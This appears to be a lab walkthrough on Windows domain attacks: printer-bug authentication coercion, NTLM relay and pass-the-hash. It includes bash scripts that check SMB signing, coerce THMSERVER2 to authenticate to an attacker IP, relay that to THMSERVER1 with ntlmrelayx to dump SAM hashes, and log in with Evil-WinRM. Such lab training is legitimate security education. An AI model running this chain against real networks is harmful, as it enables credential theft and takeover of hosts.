Exploiting Automated Relays
In this task we will take a look at coercing and relaying authentication. Authentication attempts are constantly flying across the network, and if we are lucky we can intercept some of these challenges to gain access. But what if we don't want to wait? What if we can coerce authentication to occur on demand?
Although we already have privileged access to THMSERVER1, we will not always have a constrained delegation exploit available to us. Relaying coerced authentication is another excellent attack for gaining privileged access to hosts.

Machine Accounts
1️⃣ Every Windows computer joined to a domain has a machine account.
Think of it as a user account for the computer.
The account name is the computer's name followed by a $, e.g. THMSERVER1$.
2️⃣ Machine account passwords are very long (120 characters) and rotate automatically every 30 days, so guessing or cracking them is not practical.
3️⃣ Machine accounts are used heavily within Active Directory (AD).
Domain controllers authenticate to each other with them when replicating AD changes.
When a computer requests a certificate, it authenticates using its machine account.
4️⃣ Sometimes one machine account has administrative rights over another machine.
This is common in setups such as SQL clusters, or between domain controllers.
If we can coerce such a machine account to authenticate to us, we can relay that authentication to the host it administers and gain privileged access there.
We first need to identify cases where a machine account has administrative access over another machine. BloodHound can show this; rather than its built-in queries we will use the following custom Cypher query:

The result is very interesting: it shows that the THMSERVER2 machine account (THMSERVER2$) has administrative privileges over THMSERVER1.
The Printer Bug
The printer bug is a "feature" of the MS-RPRN protocol (Print System Remote Protocol): any authenticated domain user can call RpcRemoteFindFirstPrinterChangeNotificationEx to make a host running the Print Spooler service authenticate to a host of the caller's choosing. It is one of several authentication coercion primitives seen in recent years. PetitPotam achieves the same effect through MS-EFSRPC rather than the spooler, while PrintNightmare is a separate spooler vulnerability that leads to code execution rather than coerced authentication.
To exploit this, apart from the machine account's administrative privileges, we also need to meet the following four conditions:
A valid set of AD account credentials.
Network connectivity to the target's SMB service.
The target host must be running the Print Spooler service.
The host we relay the authentication to must not have SMB signing enforced.
Conditions 1 and 2 are already met. We need to verify conditions 3 and 4.
Print Spooler Service
We need to determine whether the Print Spooler service is running on THMSERVER2. Since we do not have access to THMSERVER2 itself, we have to query it from the network. From our SSH session on the THMWRK1 workstation we can run a WMI query for the service's current state:

The output of the cmdlet confirms that the service is running.
SMB Signing
In order to relay the coerced authentication attempt, SMB signing must not be enforced on the host we relay to. Note the difference between SMB signing being allowed and being enforced: because some legacy systems do not support signing, the default configuration on Windows member servers and workstations is that signing is allowed but not required, so it is only used when both sides negotiate it (domain controllers are the exception and require it by default). Signing would break the relay because a signed session requires a session key derived from the authenticating account's password hash, which we never learn from a relayed exchange. Since we run both the rogue SMB server that receives the coerced authentication and the client that forwards it to the target, neither side negotiates signing, and a target that merely allows signing will accept the unsigned session.
Verify that THMSERVER1 and THMSERVER2 do not have SMB signing enforced using Nmap:
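Condition 4 can be checked from the attacking machine with Nmap's smb2-security-mode script (and smb-security-mode for hosts that still speak SMB1). The script below is an added example, not part of the original task: it shows the scan command and then classifies each host from the scan output as relayable or signing-enforced, which is the decision we have to make before pointing ntlmrelayx at a target. The Nmap output embedded in it is constructed, and the host names and addresses (including a domain controller, which enforces signing by default and so shows the failure case) are assumptions.

```shell
#!/usr/bin/env bash
# Added example: decide which hosts are viable NTLM relay targets from Nmap's
# SMB signing checks. The scan itself needs network access, so it lives in a
# function that is not called here; the output parsed below is constructed.

# Scan the given hosts for SMB signing requirements (SMB2 and legacy SMB1 scripts).
scan_smb_signing() {
    nmap -Pn -p445 --script smb2-security-mode,smb-security-mode "$@"
}

# Classify one host's Nmap block.
# SMB2: "Message signing enabled but not required" -> relayable
#       "Message signing enabled and required"     -> signing-enforced
# SMB1: "message_signing: disabled|supported"      -> relayable
#       "message_signing: required"                -> signing-enforced
signing_state() {
    local block="$1"
    if grep -qi 'enabled and required' <<<"$block" \
       || grep -qi 'message_signing: required' <<<"$block"; then
        echo "signing-enforced"
    elif grep -qi 'enabled but not required' <<<"$block" \
         || grep -qiE 'message_signing: (disabled|supported)' <<<"$block"; then
        echo "relayable"
    else
        echo "unknown"
    fi
}

# Split a normal-format Nmap report into per-host blocks; print "<host> <state>".
relay_candidates() {
    local report="$1" host="" block=""
    while IFS= read -r line; do
        if [[ "$line" =~ ^Nmap\ scan\ report\ for\ (.+)$ ]]; then
            if [[ -n "$host" ]]; then echo "$host $(signing_state "$block")"; fi
            host="${BASH_REMATCH[1]}"
            block=""
        else
            block+="$line"$'\n'
        fi
    done <<<"$report"
    if [[ -n "$host" ]]; then echo "$host $(signing_state "$block")"; fi
}

# Constructed Nmap output (assumed names and addresses): two member servers with
# the Windows default of signing allowed but not required, and a DC that requires it.
SAMPLE_SCAN='Nmap scan report for THMSERVER1 (10.0.0.11)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for THMSERVER2 (10.0.0.12)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for THMDC (10.0.0.1)
Host is up (0.0009s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required'

relay_candidates "$SAMPLE_SCAN"
```

Only hosts reported as relayable are worth relaying to; a signing-enforced host rejects the relayed session because we cannot produce the signing key. What matters most is the host we relay to (THMSERVER1 here); the coercion victim (THMSERVER2) primarily needs to be running the spooler.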

Exploiting Authentication Relays
We will use SpoolSample from this GitHub repo; a compiled binary has already been provided in the task.

We will use SpoolSample.exe to coerce THMSERVER2 to authenticate to our attacking machine, and Impacket's ntlmrelayx, running on the attacking machine, to relay that authentication attempt to THMSERVER1. Start ntlmrelayx first so that it is already listening when the callback arrives.


We receive a callback, and ntlmrelayx relays it to THMSERVER1 and dumps the local SAM hashes.

Log in to THMSERVER1 as the ServerAdmin account from the SAM dump using Evil-WinRM, passing the NT hash instead of a password.

Retrieve the flag from the Administrator.ZA user's directory.
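The complete chain described above, as an added example rather than the task's own commands: start the relay, trigger the spooler coercion from THMWRK1, and turn the SAM dump into a pass-the-hash login. The script also parses the dump so the NT hash can be picked out of ntlmrelayx's output instead of copied by hand. The IP addresses, the relay.log file name and the SAM dump contents are constructed; the hashes in the dump are patterned placeholders (Guest carries the well-known empty-password hash), not credentials from the lab.

```shell
#!/usr/bin/env bash
# Added example (not the task's own commands): coerce THMSERVER2$ with the printer
# bug, relay it to THMSERVER1 with ntlmrelayx, and log in with the dumped hash.
# Assumptions: the addresses below, the log file name, and the SAM dump sample.

ATTACKER_IP="10.50.0.5"       # our attacking machine (assumed)
THMSERVER1_IP="10.0.0.11"     # relay target; THMSERVER2$ is a local admin here (assumed address)
THMSERVER2="THMSERVER2"       # coercion victim; must be running the Print Spooler

# Step 1 (attacking machine): listen for the coerced authentication and relay it
# to THMSERVER1 over SMB. When the relayed account is a local admin, ntlmrelayx's
# default action is to dump the local SAM. -smb2support is needed because the
# victim speaks SMB2. Start this BEFORE triggering the coercion. Some installs
# name the tool impacket-ntlmrelayx instead of ntlmrelayx.py.
start_relay() {
    ntlmrelayx.py -smb2support -t "smb://${THMSERVER1_IP}" | tee relay.log
}

# Step 2 (THMWRK1, over SSH, Windows side, not from this shell): force the victim
# to authenticate to us:
#   SpoolSample.exe THMSERVER2 10.50.0.5
# The spooler on THMSERVER2 connects back to our rogue SMB server as THMSERVER2$,
# and ntlmrelayx forwards that NTLM exchange to THMSERVER1.

# Pull the NT hash for USER out of a SAM dump in the format ntlmrelayx prints,
#   user:rid:lmhash:nthash:::
# Prints nothing if the user is absent.
nt_hash_for() {
    local user="$1" dump="$2"
    awk -F: -v u="$user" '$1 == u && NF >= 4 { print $4; exit }' <<<"$dump"
}

# Step 3: pass the hash to Evil-WinRM. ServerAdmin comes from the SAM, so it is a
# local account and needs no domain prefix.
evil_winrm_command() {
    local user="$1" hash="$2"
    printf 'evil-winrm -i %s -u %s -H %s\n' "$THMSERVER1_IP" "$user" "$hash"
}

# Constructed sample of the relay output. The NT hashes are patterned placeholders
# (Guest carries the well-known empty-password hash), not lab credentials.
SAMPLE_DUMP='[*] Authenticating against smb://10.0.0.11 as ZA/THMSERVER2$ SUCCEED
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ServerAdmin:1000:aad3b435b51404eeaad3b435b51404ee:a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1:::
[*] Done dumping SAM hashes for host: 10.0.0.11'

# In a live run: start_relay in one terminal, SpoolSample on THMWRK1, then
#   nt_hash_for ServerAdmin "$(cat relay.log)"
hash="$(nt_hash_for ServerAdmin "$SAMPLE_DUMP")"
evil_winrm_command ServerAdmin "$hash"
```

The fourth colon-separated field is the NT hash; Evil-WinRM's -H takes only that half, not the LM:NT pair as printed.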
